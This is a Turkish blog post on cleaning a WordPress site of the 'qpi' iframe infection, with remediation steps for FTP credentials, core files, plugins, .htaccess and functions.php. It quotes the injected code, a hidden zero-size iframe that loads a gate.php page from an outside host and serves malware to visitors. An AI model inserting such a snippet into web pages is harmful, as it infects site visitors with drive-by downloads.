WordPress qpi iframe virüsü temizle

Başta ben biton site sahibinin nefret ettiği yeni iframe virüsünün nerden nasıl girdiğini kimse anlamıyor bile. Virüsü bilgisayarımda bulamadığım için sadece kurtulma yöntemlerini açıklayacağım size.

Virüsümüz iframe virüsü olarak bilinir ve web dünyasında zaman zaman hortlayarak webmasterların canını sıkar.

<!–qpi–><iframe src=http://falanfilan.com/gate.php?f=955155 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!–/qpi–>

işte bu kodu sitemizin çeşitli dosyalına yazıyor. wp-login.php footer.php
Load.php wp-admin.php ve çeşitli scriptlerin çeşitli dosyalarına hemen
tagının üstüne ekliyor kendini. İlk farkettiğimde bilgisayarıma bir pdf dosyası
indirdi ve bu pdf virüslü olduğu için anti-virüs engelledi açamadı. Bunu görür görmez ilk yaptığım şey Filezilladan şifrelerimi silmek oldu.

Şimdi siz ne yapıcaksınız oraya geleyim İlk önce ftp programı kullanıyorsanız programın kaydettiği şifreleri silin ve hemen ftp şifrenizi değişin. Bu tür programlar bir xml dosyası kullarak şifreleri orada tutar ve bu dosyayı virüsler okuyarak işlem yapabilir veya herhangi bir yere gönderebilir. Bilgisayarınıza bir virüs taraması yapın(Avira tavsiyemdir bişey bulmazsa Kaspersky deneyebilirsiniz))
Daha sonra eğer dosyalarınızın yakın zamanda yedeği varsa yedeğinizi yükleyin.
Yedeğiniz yoksa tema dosyaları hariç tüm dosyaları orjinalleriyle değiştirin. Smf kullanıyorsanız eklentileriniz hata vericektir bu yüzden önce tüm eklentileri devre dışı bırakıp dosyaları ondan sonra orjinalleriyle değiştiriniz.

WordPress için tüm dosyaları orjinalleriyle değiştirainiz. Bu virüs .js dosyalarına bile giriyor. WordPresste ilk belirtileri dosya yüklenememesi Eğer temanızın dosyalarını kendinize göre editlediyseniz ve yedeğiniz yoksa editlediğiniz dosyalarda

<iframe width="320" height="240"></iframe>

diye aratarak editli dosyalarınızın yedeğini alın içlerindeki iframe kodlarını silerek temanızı kurtarabilirsiniz..

Önlem olarak tüm dosyalarınızın yazma izinlerini 555 yapmanızı öneriyorum birde. Ne olur ne olmaz sadece wordpress için wp-content/uploads klasörü ve içindekiler hariç.

Son olarak sürekli güvenliğiniz ve temizlendiğinizden emin olmak için wordpressin exploit scanner eklentisini buradan indirebilirsiniz. Exploit scanner çok güzel bir eklenti şöyle ki; sunucunuzdaki tüm dosyaları tarayıp exploit iframe ve bir çok hack ve virüs bulaştırma yönteminde kullanılan kodları ve bulundukları dosyaları listeliyor.

Kesinlikle işlemlerden önce ftp şifrenizi değiştirin yoksa yine girer bu virüs.

 

1. Virüsler temanızın footer.php dosyasına bulaşmış olabilir!

Böyle bir durumda WordPress ana dizinine girip sırasıyla wp-content, themes klasörlerine girin. Ardından kullanmakta olduğunuz tema klasörüne girip içindeki footer.php dosyasını düzenlemek için açın. Bu konuda çeşitli virüs türleri olduğundan buraya tek tek yazamayacağım ama gözünüze yabancı gelen kodları silerek kontrollerinizi yapın.

2. Virüs bir eklenti yordamıyla çalışıyor olabilir!

Eklentiler de sitenize virüs niteliği taşıyan kodları ekliyor olabilir. Bu durumda yönetim panelinde Eklentiler sekmesine girin. Tüm eklentileri seçip Etkinsizleştir seçeneğiyle tümünü pasif yapın. Daha sonra düzelme olması durumunda eklentileri sırayla aktifleştirerek hangi eklentinin sorun yarattığını saptamaya çalışın.

Bir eklentide kanaat getirdiğinizde ise bu eklentiyi wordpress.org üzerinden tekrar yüklemeyi deneyin. Sorun yine devam ediyorsa alternatif eklentiler kullanın.

3. Virüs .htaccess dosyanıza bulaşmış olabilir!

Genellikle hosting kaynaklı virüsler .htaccess dosyası üzerinden çalışıyor. Çünkü bu konuda bilgi düzeyi çok iyi olmayan kişilerin .htaccess dosyasını kontrol etmek pek akıllarına gelmez ve böylelikle virüsü bir türlü temizleyemezler. .htaccess dosyanızdan emin değilseniz dosyayı WordPress ana dizininden tamamen silin ve yönetim paneline girip Ayarlar > Kalıcı Bağlantılar sekmesinden ayarlarınızı değişiklik yapmadan tekrar kaydedin.

4. Virüs temanızın functions.php dosyasına bulaşmış olabilir!

Site yöneticilerinin temaya zarar verebileceği korkusuyla functions.php dosyasını açmaya korkacakları için virüsler bu dosyaya da saklanıyor. Temanız size özel bir tema değilse ham halini tekrar indirip functions.php yi sitenizdekiyle değiştirin.